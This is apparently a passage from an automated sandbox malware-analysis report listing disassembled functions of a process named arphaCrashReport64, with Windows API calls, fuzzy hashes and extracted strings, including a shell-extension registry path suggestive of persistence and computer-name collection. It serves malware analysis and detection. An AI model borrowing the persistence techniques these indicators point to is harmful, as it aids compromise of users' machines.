                                            • FlsSetValue.KERNEL32(?,?,?,00007FFDFB8B253D,?,?,?,?,00007FFDFB8B1ECD,?,?,?,00007FFDFB8B16FD), ref: 00007FFDFB8B2A04
                                            • free.LIBCMT ref: 00007FFDFB8B2A27
                                            • GetCurrentThreadId.KERNEL32 ref: 00007FFDFB8B2A18
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                            • String ID:
                                            • API String ID: 3106088686-0
                                            • Opcode ID: cfb8b4d3f9f268453a24d3586011c135f673f5bf1bd9900e77872722a9a9253e
                                            • Instruction ID: cf13fda5482e6b3320184e23905efa4eee1c953ac2b35242b7efc58d9af1d651
                                            • Opcode Fuzzy Hash: cfb8b4d3f9f268453a24d3586011c135f673f5bf1bd9900e77872722a9a9253e
                                            • Instruction Fuzzy Hash: 91015224B2A74786EB656F75A464C792691AFC8761F14C234C93D063F9DE3CA4498E80
                                            Function 0000024B645948D4 Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetLastError.KERNEL32(?,?,?,0000024B64593209,?,?,?,?,0000024B645A3CCA,?,?,?,?,0000024B645A34F1), ref: 0000024B645948DE
                                            • FlsGetValue.KERNEL32(?,?,?,0000024B64593209,?,?,?,?,0000024B645A3CCA,?,?,?,?,0000024B645A34F1), ref: 0000024B645948EC
                                            • SetLastError.KERNEL32(?,?,?,0000024B64593209,?,?,?,?,0000024B645A3CCA,?,?,?,?,0000024B645A34F1), ref: 0000024B64594944
                                              • Part of subcall function 0000024B6459537C: Sleep.KERNEL32(?,?,ceil,0000024B64594907,?,?,?,0000024B64593209,?,?,?,?,0000024B645A3CCA), ref: 0000024B645953C1
                                            • FlsSetValue.KERNEL32(?,?,?,0000024B64593209,?,?,?,?,0000024B645A3CCA,?,?,?,?,0000024B645A34F1), ref: 0000024B64594918
                                            • free.LIBCMT ref: 0000024B6459493B
                                            • GetCurrentThreadId.KERNEL32 ref: 0000024B6459492C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                            • String ID:
                                            • API String ID: 3106088686-0
                                            • Opcode ID: 6ebd17abd531518c99cd0e2d202aae095663125e7d7d49137b697db85a716716
                                            • Instruction ID: a92505548b307b8a79e016ce0ff47b1768a9361a7ae22ccd89dcbdacaa5b7335
                                            • Opcode Fuzzy Hash: 6ebd17abd531518c99cd0e2d202aae095663125e7d7d49137b697db85a716716
                                            • Instruction Fuzzy Hash: F9014825605FC086FB569F65E45C228229BBB49BA0F5A4229DB35033D9DF38C8858619
                                            Function 0000024B642B1350 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 224COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd$CallTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3569367362-2084237596
                                            • Opcode ID: a6f955ceb13d2aead7e47fc715c960d9cbe24e492db051bcc867407ba1bb340d
                                            • Instruction ID: 7bf9759db1177db275dc16652c5cc71e67c5e77d29840a90a16f068fc50ada50
                                            • Opcode Fuzzy Hash: a6f955ceb13d2aead7e47fc715c960d9cbe24e492db051bcc867407ba1bb340d
                                            • Instruction Fuzzy Hash: A871E430128F098EEB66EF54C0097E5B3E4FB81348F614A5ED485C354EEBB4E591CB86
                                            Function 0000024B645A1998 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 143COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd$CallTranslator_amsg_exit
                                            • String ID: MOC$RCC
                                            • API String ID: 1374396951-2084237596
                                            • Opcode ID: a6f955ceb13d2aead7e47fc715c960d9cbe24e492db051bcc867407ba1bb340d
                                            • Instruction ID: cdbe38d82a84884c5eacb7151c627bafb0ed4a074598f07f4e30be9810bb0c86
                                            • Opcode Fuzzy Hash: a6f955ceb13d2aead7e47fc715c960d9cbe24e492db051bcc867407ba1bb340d
                                            • Instruction Fuzzy Hash: 9C610772204EC486DFA1CF15E0843ADB7AAF781B88F4A4517DB9E4768DDB78C199C704
                                            Function 0000024B645A1511 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd$ExceptionRaise_amsg_exit
                                            • String ID: csm
                                            • API String ID: 4155239085-1018135373
                                            • Opcode ID: 3d7b47e0f6bab72505bbf465c5b16e1dcb4b87de87066540f1dd17ecd2e8909f
                                            • Instruction ID: 32ae3308c66e10982024e33fb0173698d91308ea64486bef9d5dbc380c255962
                                            • Opcode Fuzzy Hash: 3d7b47e0f6bab72505bbf465c5b16e1dcb4b87de87066540f1dd17ecd2e8909f
                                            • Instruction Fuzzy Hash: 5F318636104A8483E771DF12E04879E7766F3497A5F064217DFAA03799CB39D889CB14
                                            Function 0000024B645923A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: ComputerNamelstrcpywsprintf
                                            • String ID: SOFTWARE\%sW\$UnKnow
                                            • API String ID: 2045598086-1925786254
                                            • Opcode ID: 25c50ad494a74fd68276a52b2ad7a8bf00471c7cb4c17d8fbebd1e3e914b1a27
                                            • Instruction ID: c852fa09c03b802b47a5aeb91c0227431d856bc0a4b2868bcbf96f7773a809a7
                                            • Opcode Fuzzy Hash: 25c50ad494a74fd68276a52b2ad7a8bf00471c7cb4c17d8fbebd1e3e914b1a27
                                            • Instruction Fuzzy Hash: 64219521228EC195EB51DF20E8487DEA7A6F7D4744F810012A78D83A6DEB7DC14DCB09
                                            Function 0000024B645922C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: ComputerNamelstrcpywsprintf
                                            • String ID: SOFTWARE\%sW\$UnKnow
                                            • API String ID: 2045598086-1925786254
                                            • Opcode ID: 9a0f78225019bec5deb3bcd3db4271389db7be9a6f745cdf9b7e71a9e80b477f
                                            • Instruction ID: 49cc45fc017258abd864e03b3c3f4392fdcf1622b425594f835cc5da4752253d
                                            • Opcode Fuzzy Hash: 9a0f78225019bec5deb3bcd3db4271389db7be9a6f745cdf9b7e71a9e80b477f
                                            • Instruction Fuzzy Hash: 9E114932218DC192EB21DF11F8887AA63A6F7D8744F864012E78D87A5DEF3DC559CB05
                                            Function 0000024B6458F600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: CloseOpenValue
                                            • String ID: SOFTWARE\Classes\*\shellex$Start
                                            • API String ID: 779948276-205936948
                                            • Opcode ID: 0ca0d2eb96febe7c3f1de3174b521f459ddaae00c317af299b2ead55954e0038
                                            • Instruction ID: 4100d65151fd87ae9cd333b32db6943c61db5ad917dabbfc94d46564722edd9e
                                            • Opcode Fuzzy Hash: 0ca0d2eb96febe7c3f1de3174b521f459ddaae00c317af299b2ead55954e0038
                                            • Instruction Fuzzy Hash: E4015E72214F8586DB11CF61F44864AB3AAF788794F400226EA8D43B68DF7CC158CB08
                                            Function 00007FFDFB8B7A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 18COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd
                                            • String ID: MOC$csm
                                            • API String ID: 3186804695-1389381023
                                            • Opcode ID: 4a34930d29bf81a0581adaca7159c768ebe2e98b5ac62447c7710d4d58faff46
                                            • Instruction ID: 1ffdf628f0a5cfaee97f9042474e58816a31aada6b6cd246a68a41d93b0276d3
                                            • Opcode Fuzzy Hash: 4a34930d29bf81a0581adaca7159c768ebe2e98b5ac62447c7710d4d58faff46
                                            • Instruction Fuzzy Hash: 5EE0ED35A2A10389E7593B74C4657F83990ABD4705F85E470C26C423F68B7C95848E92
                                            Function 0000024B642AB5F4 Relevance: 7.8, APIs: 5, Instructions: 268COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: b43a66ac7ff6aaea2afa98109b798b6886ea9ecbd7ee844780fc29dcba4b1917
                                            • Instruction ID: 00da372a06d2f1183405b5df28011cf824ffe138b2f8b9b2a77bba0d12876a5f
                                            • Opcode Fuzzy Hash: b43a66ac7ff6aaea2afa98109b798b6886ea9ecbd7ee844780fc29dcba4b1917
                                            • Instruction Fuzzy Hash: D881B631628E0C8FEF5ADF1C94597A577D5FB58300F21015EE94AC328ADB70D885CB89
                                            Function 0000024B64297698 Relevance: 7.7, APIs: 5, Instructions: 187COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free$mallocstd::exception::exception
                                            • String ID:
                                            • API String ID: 4069110180-0
                                            • Opcode ID: ec827b053d5fad73fcf0492e3d2725338dc407ece077524a1dae6e7b927291dc
                                            • Instruction ID: feaeabfbc4d2e738da6130ef5d2f152bcc18b41a3e9f8dbe8234ef481c352d13
                                            • Opcode Fuzzy Hash: ec827b053d5fad73fcf0492e3d2725338dc407ece077524a1dae6e7b927291dc
                                            • Instruction Fuzzy Hash: AD51AE70A24E0D8FEF5AEF99D4597EDB7A6FB58300F21012E9409D319ADB30D449CB89
                                            Function 0000024B6429CA18 Relevance: 7.7, APIs: 5, Instructions: 175COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free$mallocstd::exception::exception
                                            • String ID:
                                            • API String ID: 4069110180-0
                                            • Opcode ID: 07180e9b4d2e60f22a41465041aba0a5742f0305ed2e05aa6cee22b514af3519
                                            • Instruction ID: 3672137b70fb4b0f286fcacd71e4d20b59ee78c7e8da7c4470a8af2791266a5b
                                            • Opcode Fuzzy Hash: 07180e9b4d2e60f22a41465041aba0a5742f0305ed2e05aa6cee22b514af3519
                                            • Instruction Fuzzy Hash: 54518F70524E0D8FEF56EF59D459BEAB7E4FF14700F21016A9809C3299DB30D949CB85
                                            Function 0000024B6459BC3C Relevance: 7.7, APIs: 5, Instructions: 168COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free$__free_lconv_num
                                            • String ID:
                                            • API String ID: 1547021563-0
                                            • Opcode ID: c16b6f9737590003a136c8fcef27dda7f25507dba1af4cbde7d58d3b88c3e8cd
                                            • Instruction ID: b660e330ea3fa0a01d06f0ce6779baa9f0a1fada23180d97e66f806b62cb4ee2
                                            • Opcode Fuzzy Hash: c16b6f9737590003a136c8fcef27dda7f25507dba1af4cbde7d58d3b88c3e8cd
                                            • Instruction Fuzzy Hash: E761C132205FC58AFB66AF26E04879D77AAF788B84F064025EF8947799DB38C501C748
                                            Function 0000024B642A6B98 Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _lock$_errno_getptd_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2808128820-0
                                            • Opcode ID: 9f4985a2a933d0fc62c1a2c77e0ed4ea76d4ee0366b7b778643bc997e4b882e3
                                            • Instruction ID: e4935c262d16d2518865b5296cc31d12a5d236d1ff54ee61e3aa288c870a6075
                                            • Opcode Fuzzy Hash: 9f4985a2a933d0fc62c1a2c77e0ed4ea76d4ee0366b7b778643bc997e4b882e3
                                            • Instruction Fuzzy Hash: A541A730628E088BFF46EB1C94897A973D5FB88300F264569EC49C72DFDB64D8898759
                                            Function 0000024B645971E0 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _lock$_errno_getptd_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2808128820-0
                                            • Opcode ID: f453061cc0ae8c4d2774961133183c75c1575bd9b631a75802a1a20d267780ef
                                            • Instruction ID: 2b182e3c3486641f113f29cb2dee4fc7cfa989fd21ceb815ee9aece43dbc73c5
                                            • Opcode Fuzzy Hash: f453061cc0ae8c4d2774961133183c75c1575bd9b631a75802a1a20d267780ef
                                            • Instruction Fuzzy Hash: 1641AC21201EC0C5FB5AEB21A9597AE639BBB86BC4F164129EF09077DEDF78C401C708
                                            Function 0000024B6459A9F4 Relevance: 7.6, APIs: 5, Instructions: 102COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$StringTypefreemalloc
                                            • String ID:
                                            • API String ID: 307345228-0
                                            • Opcode ID: ee07f6c5636d413e7892bfcbeb0f91cdd1ccbdd2d21149ca3b3503bd82049be4
                                            • Instruction ID: b7e6d99d52c284f20f905a3ffe157feceea397c267c896afa688958cccded1f6
                                            • Opcode Fuzzy Hash: ee07f6c5636d413e7892bfcbeb0f91cdd1ccbdd2d21149ca3b3503bd82049be4
                                            • Instruction Fuzzy Hash: 62418422600FC087FB229F25980869973DAFB48BA8F5E4616EF2D477D9DB38C8418314
                                            Function 0000024B645A33D8 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _ctrlfp$_set_statfp$_exception_enabled_raise_exc
                                            • String ID:
                                            • API String ID: 3456427917-0
                                            • Opcode ID: 12a622c847374f3166387e9d70a91a980054b998477e05dec9cd0e20066f5fc0
                                            • Instruction ID: 57219d1d48894c4f551b7f633cfaf8f7cb5f9f6845aa2e5c5b60762c7f983014
                                            • Opcode Fuzzy Hash: 12a622c847374f3166387e9d70a91a980054b998477e05dec9cd0e20066f5fc0
                                            • Instruction Fuzzy Hash: 75318332614F848AE752DF25E8056AFB77AF785798F010216FE494BA58DF38C485CB04
                                            Function 00007FFDFB8B26D4 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • DecodePointer.KERNEL32(?,?,?,00007FFDFB8B27E5,?,?,?,?,00007FFDFB8B2F3E,?,?,000005AA,00007FFDFB8B1957), ref: 00007FFDFB8B26FD
                                            • DecodePointer.KERNEL32(?,?,?,00007FFDFB8B27E5,?,?,?,?,00007FFDFB8B2F3E,?,?,000005AA,00007FFDFB8B1957), ref: 00007FFDFB8B270C
                                            • EncodePointer.KERNEL32(?,?,?,00007FFDFB8B27E5,?,?,?,?,00007FFDFB8B2F3E,?,?,000005AA,00007FFDFB8B1957), ref: 00007FFDFB8B2789
                                              • Part of subcall function 00007FFDFB8B2D54: realloc.LIBCMT ref: 00007FFDFB8B2D7F
                                              • Part of subcall function 00007FFDFB8B2D54: Sleep.KERNEL32(?,?,00000000,00007FFDFB8B2779,?,?,?,00007FFDFB8B27E5,?,?,?,?,00007FFDFB8B2F3E,?,?,000005AA), ref: 00007FFDFB8B2D9B
                                            • EncodePointer.KERNEL32(?,?,?,00007FFDFB8B27E5,?,?,?,?,00007FFDFB8B2F3E,?,?,000005AA,00007FFDFB8B1957), ref: 00007FFDFB8B2798
                                            • EncodePointer.KERNEL32(?,?,?,00007FFDFB8B27E5,?,?,?,?,00007FFDFB8B2F3E,?,?,000005AA,00007FFDFB8B1957), ref: 00007FFDFB8B27A4
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                            • String ID:
                                            • API String ID: 1310268301-0
                                            • Opcode ID: 833ce39054213573de68db77b97d1c96f5c3f0e6f124e3096409f4bbaafb4565
                                            • Instruction ID: 9330d53bdee6dc3eb225811fb5cc554145662b32193c0bc62ed8a6c392505931
                                            • Opcode Fuzzy Hash: 833ce39054213573de68db77b97d1c96f5c3f0e6f124e3096409f4bbaafb4565
                                            • Instruction Fuzzy Hash: FC215311B2B64780EB05BF31E5688B96651BB847C0F449835D52D077EDDE7CE0858B88
                                            Function 0000024B64593E80 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Pointer$Encode$Decode$Sleep_errno_invalid_parameter_noinforealloc
                                            • String ID:
                                            • API String ID: 1909145217-0
                                            • Opcode ID: 78e45ef783413b217608e0a16efdd3366037ad4d8c45b9786596f5e959a3f801
                                            • Instruction ID: 1abb5bb3a9f57d6c39412ef817188089677596d4b2d7b826e4abd93041b6906f
                                            • Opcode Fuzzy Hash: 78e45ef783413b217608e0a16efdd3366037ad4d8c45b9786596f5e959a3f801
                                            • Instruction Fuzzy Hash: 47218121301F8481EA429F61F95C259A3ABB74ABC5F455436EE0D1775DEB7CC485C30C
                                            Function 0000024B6458DD70 Relevance: 7.6, APIs: 5, Instructions: 61stringtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: File$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
                                            • String ID:
                                            • API String ID: 3163932117-0
                                            • Opcode ID: 9c2e0b957a80f6091012f204cde0cca7ec84f3484f66381548a359e3a2c0dc0e
                                            • Instruction ID: a860ff822ae0c3913f77e98abb6f550819395949e7665c0b17847dd042d3068c
                                            • Opcode Fuzzy Hash: 9c2e0b957a80f6091012f204cde0cca7ec84f3484f66381548a359e3a2c0dc0e
                                            • Instruction Fuzzy Hash: 15319A71614D8481EB56DF51F84836AB7ABF794749F424016E78D83A6CEF3CC188CB09
                                            Function 00007FFDFB8B3F24 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                            • String ID:
                                            • API String ID: 1445889803-0
                                            • Opcode ID: c5648ee1173fb6256d6eab9c05b122572d875354a995a585e1bc24b4115fb78a
                                            • Instruction ID: b13b94b18d5e7d22f88375322a28a4e72161609e106519ed4365fc7b7215dc7b
                                            • Opcode Fuzzy Hash: c5648ee1173fb6256d6eab9c05b122572d875354a995a585e1bc24b4115fb78a
                                            • Instruction Fuzzy Hash: 8001822177AA0786EB908F31E4606656360FB89B91F44A530DE6E477F8CF3CD8858B80
                                            Function 0000024B645998D0 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                            • String ID:
                                            • API String ID: 1445889803-0
                                            • Opcode ID: 3fc3725ca8a288ac075f2860f78d41a9700cbea2c759c06011dc5ba40e0d3bd0
                                            • Instruction ID: 54f38050429ad1471324578db1f75b61cbf494356132c59f88bc82db47529f96
